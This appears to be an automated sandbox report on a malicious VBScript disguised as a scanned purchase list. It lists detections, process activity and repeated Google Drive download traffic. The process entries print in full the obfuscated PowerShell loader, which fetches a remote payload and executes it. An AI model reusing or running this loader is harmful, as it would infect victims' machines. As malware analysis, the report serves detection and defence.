

Windows Analysis Report
Scanned Purchase List.vbs

Overview

General Information

Sample name: Scanned Purchase List.vbs
Analysis ID: 1523158
MD5: 15b5b581555ff3e269c973f152f71cf6
SHA1: b192825801c73167464fe4fdc71925b296379d24
SHA256: 24bddce898f1e7b3feb484483fe5bad7a29b95cdabef060ca7872d3ec3c2597f
Tags: vbs, user-abuse_ch

Detection

Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Potential malicious VBS script found (suspicious strings)
Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 7348 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7444 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . 
VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNonn ineBaltA asD.t) su ';$Billaanets=$counterargues;tramelling (doublecrossing ' or$BilGBomLEneoB tbslaaBorlThr:r taPolP InoBo.CKa rIndiFugs riiTemA RaRElsY.al=Bar(T lTsquemars stT.ar-H.aP DraRabTRekHUns Ve $FisbOphIfreLM.nL saa LoAProNslaEsuktValsUni) h ');while (!$Apocrisiary) {tramelling (doublecrossing 'But$kurgAn,lLabo eb omaUnplHay:Rare tuuRovpQuah,oro P r BebKopiUndaMsslMaa=End$PretskorT auAc e ca ') ;tramelling $semicolloquially;tramelling (doublecrossing 'Ejesne tAn a inrHeatCol-BrassamlUnde epeNatpDag Ove4Des ');tramelling (doublecrossing 'Hil$ Img flsk oConbmisaDenlFra:MasA edpEnaoEkscPr,rBesiYo.sCrei Coa Vgr LuyA t=sun(K lTIngeAngsF,etGen- F.PProajawt M,hUrt Uni$sa Bskai VelDefls aaD pa O n oeMu.tG as wh)ste ') ;tramelling (doublecrossing ' W.$ m g KolUddoArab onaAu l re: spEs unNa.est rsikg.isieftmI fnDdsg HjdstueN n=Ord$ TygCollNaroTrubLeuaGullLyd:FalTP,oiTypdA bsA phFo.o scr U,i ResBisoGran.omt Wase b+ Di+fo %Dre$EnhsOmvtAs,yOpdr astEpidDy,yFl.kLyckFale efrUnd..emcManospruFusnDyrtsk, ') ;$Encheson=$styrtdykker[$Energimngde];}$Arthriticine=282118;$sorteringsordenen=30262;tramelling (doublecrossing 'Pl.$WabgCenlslaoLeubFraa jal t : g.Osi.mBets 
ortGloy U.rProtPseeHyptEpi slv=Bai st G Alesutt.xa-sacC PtoPosnP ntHa.eLu.n cetC.e Br$ .tBen,i amlPral leaBliasarnOldeMontEkss Di ');tramelling (doublecrossing 'sty$salg Auls po ekb abaph lOpe:,arsso.t pioBard CodGene ajrFlikVano PrnspigE ee phnU d Ext=E e mi.[Mi sTepyFlysOlitTaveKipm.ol. emCspyosannFunv HaeAmpr CotOm ]B,g:Beg:VouFD,nr.etoUnwmscrBsc aKapsLuneUpp6Pis4 Hos TwtIntrCh iAfgnraagTer(Kam$EmpOB.omAmbssket piyJu r,ret R eApptAld) sl ');tramelling (doublecrossing 'Fi $,mmgjo l skoPosb O.asunl i:by,NKo,o C tD ma.xmrsc iBoazKomisarnRefgB.a Ma=Euc Unc[ HasD nyTemsBettBiseFlamM k.RomTI seDisxambtBlo.WigEOs nDigcBabo Pad PliAfsnTimgTik],kr:De : slAFars ReCUnuIsamI.ta. H,G .reEsttConsCymtU ora,visa nHoggInf(ye $Fr s ngt A,oBledAardRe e MorInskVagoF,dnMicgAlleCatnall) Re ');tramelling (doublecrossing 'Mya$ eg ypl,kooU sb.oua.hol gn:TreC,ighsweuLancCsuk ,oyse.=Lio$Mi NPasoO.ltBloa C ra si DizAfkiNo n.argskr.AmpsNymu U,b sksGr tTv,rDiviseenmaagFor(T.e$,arA FurstytIndhBelrTiliNontGenis.lc nistyn,tiePha,bin$ ous,eaoKonr T,tMeleKokrHo iLinnEntgTilsshaoBarr MadKroe Ben AceNo n T ) ka ');tramelling $Chucky;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 7444 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi64_7444.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

      System Summary

      Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", ProcessId: 7348, ProcessName: wscript.exe
      Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", CommandLine|base64offset|contains: >, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scanned Purchase List.vbs", ProcessId: 7348, ProcessName: wscript.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#selvhrdendes Opdrager Hjremarginerne Dundertaler #>;$Usolidere43='Councilmen';<#Herredmmer Plasmagenic Jdindernes suttene Korjambisk decelerationsbanen Udskejelser #>;$Dimit=$host.PrivateData;If ($Dimit) {$Pantagraphic++;}function doublecrossing($spisevgringer253){$Driftsbesparelse=$Gucki+$spisevgringer253.Length-$Pantagraphic;for( $Crunchingly=3;$Crunchingly -lt $Driftsbesparelse;$Crunchingly+=4){$Nikeno+=$spisevgringer253[$Crunchingly];}$Nikeno;}function tramelling($Perhapses){ & ($boligydelsen) ($Perhapses);}$sortkldt=doublecrossing 'talM ,fospazLociDatls il Kna D,/Asy5 ke.Ind0Res Lo,(svaW oiHornfordf noanswA ss sm CoN,jrT s. Art1Epa0so,.vet0,ie;P r shoWpasi enA.y6D g4Hav;C b seexLtr6De 4 lo;Mis oerChev ,r: Ud1Ans2tra1Fer.Ri.0Unl)Les ChaG FrestocNe kUndo Ar/sor2Mur0.au1Lok0 F 0Zef1Pso0 Do1 Pr IdFEmiiVenrTegeModf umocanx a/E.i1Out2Ung1Mos. n0 A. ';$Panservaaben=doublecrossing ' s UDiss PaE AsR.lt- Unap lGTapeBjlnOlet r ';$Encheson=doublecrossing 'Gyrh aatP ntPespKnas Ti:Beh/ i/Le d T.rFrai RevFrieImp. s g Inosl.oMosg Jal steHys.RencAngomidmUn,/ vuPercWhe? 
Kne ndx stp ero rrct tplu=Pred H,ostiwpannsy,lIm oBriaEssd il&KaliF,idE f=h s1LanO DuQTyrEB rlAcc7OveU ,aGsulOPipyUncKsids VaPDecd ,aR npJ Gr9Dis1 eng L wH mqst os,rI ifV T NLinNindRLinsJea6stiPOmbVFur9 ti4Bri ';$Dioxid=doublecrossing ' s.>Fib ';$boligydelsen=doublecrossing 's aistoeAppxs m ';$Manducation='springklaps';$Drinksenes='\Paralytical.Nap';tramelling (doublecrossing 'Otu$Ar gstjl,hooEf.bCl,aCavlBev:Gerc R o Fiu RinepotsaceCamrEvaaLnorBregGr u eelimsVis=Egy$WooeJ.nn olvs l:MedaDmppTw.pPred aaasyrtMaravu.+ yk$ M DHipr eliKilnpeakskasNonepitnPhaeTilsFur ');tramelling (doublecrossing ',or$sozg emlD ro KebA taUnilPra:AcrsI vtImpyG,irE otBindManyRookFa kU ceButr Ln=Pol$ AtEAman.ykcBilhIndes.hsKeeoJobn Pa.Tyns ekpsy,lsleiAb tHav(Bil$ svD.eyiUngoCruxPleiDord To) sc ');tramelling (doublecrossing 'Maw[DifNCamestrtTer.kilsV,le sir Mev FaiBescDaweFerPTheoHypiUndnso.tNskM s.a M ns,maspegsameRidr K ] a: on:Na.sdove ApcHabuPa.r ,riJart apyskuPst,rA coskatA koF,lcAn o NelNon n= Nu kv[ ndNR aeQuatCo . VasPite BacstousynrA gisartLgtyOplPNerrTrao TrtBndoGlucHe oCyclAlaTR gyEkspsa e d]Avo:F r: phTNonlMarsP,e1s o2Idi ');$Encheson=$styrtdykker[0];$Northwardly=(doublecrossing ' Ou$sogGs mLPlaONonBTerAGlaL Or:steLIntIs oGUn H ktT p,a MtGForesl.6 Ma8s,v=optnAarE BawPar-TheostaBMilJIfaE HoC UvTnon EarsF rYLa.s.potFeeED lMHov.DelNK aE untFor.OvewJonEA,sbOplCGelL KeIsenePs nAndT sp ');tramelling ($Northwardly);tramelling (doublecrossing ' Cr$DiaLRe iDkfgL phEmutAfkaRidgEnfeFre6Til8Cir.MarHOvaePa asa.dVapestar sesFag[ un$ConPToraVo n D sBl eConrP lv TuaRa ashob Ade AnnCem].as= p$At s Kao.ntrPhotFikky pltrid K tMis ');$semicolloquially=doublecrossing ' F $.oaLHlei N gRovhReitMi as ng PreBad6Ur.8Fum.strDTypo Prwsydn rulozooAu aFerdan FBetiB ml beeMyo(Pse$ onEOffn Unc mohInceKorsCicoaftnser,sep$C,aB EmiPunl Asl s aU raNonn ineBaltA as
      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
      2024-10-01T07:45:54.091474+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 142.250.185.142 | 443 | TCP
      2024-10-01T07:46:14.480901+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 142.250.185.142 | 443 | TCP
      2024-10-01T07:46:19.571212+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49747 | 142.250.185.142 | 443 | TCP
      2024-10-01T07:46:24.654203+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49748 | 142.250.185.142 | 443 | TCP
      2024-10-01T07:46:40.297941+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49754 | 142.250.185.142 | 443 | TCP
      2024-10-01T07:47:00.922546+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49759 | 142.250.185.142 | 443 | TCP
      2024-10-01T07:47:05.956043+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.4 | 49760 | 142.250.185.142 | 443 | TCP



      AV Detection

      Source: Scanned Purchase List.vbs | Virustotal: Detection: 12%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 81.4% probability
      Source: unknown | HTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.4:49731 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49732 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49749 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.4:49750 version: TLS 1.2
      Source: unknown | HTTPS traffic detected: 142.250.184.193:443 -> 192.168.2.4:49763 version: TLS 1.2
      Source: Binary string: .pdb_ | source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32W | source: powershell.exe, 00000001.00000002.3012431445.000001ADE7E24000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Core.pdb, | source: powershell.exe, 00000001.00000002.3012431445.000001ADE7DC9000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1 | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49759 -> 142.250.185.142:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49746 -> 142.250.185.142:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49737 -> 142.250.185.142:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49760 -> 142.250.185.142:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49747 -> 142.250.185.142:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 142.250.185.142:443
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49748 -> 142.250.185.142:443
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /download?id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94&export=download HTTP/1.1 | Host: drive.usercontent.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=1OQEl7UGOyKsPdRJ91gwqoIVNNRs6PV94 HTTP/1.1 | Host: drive.google.com | Connection: Keep-Alive
      Source: global traffic | DNS traffic detected: DNS query: drive.google.com
      Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=utf-8 | Cache-Control: no-cache, no-store, max-age=0, must-revalidate | Pragma: no-cache | Expires: Mon, 01 Jan 1990 00:00:00 GMT | Date: Tue, 01 Oct 2024 05:45:42 GMT | P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." | Cross-Origin-Opener-Policy: same-origin | Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport | Content-Security-Policy: script-src 'nonce-q8oJJG7lrmgUDLiilGDf0Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' | Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist | Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, 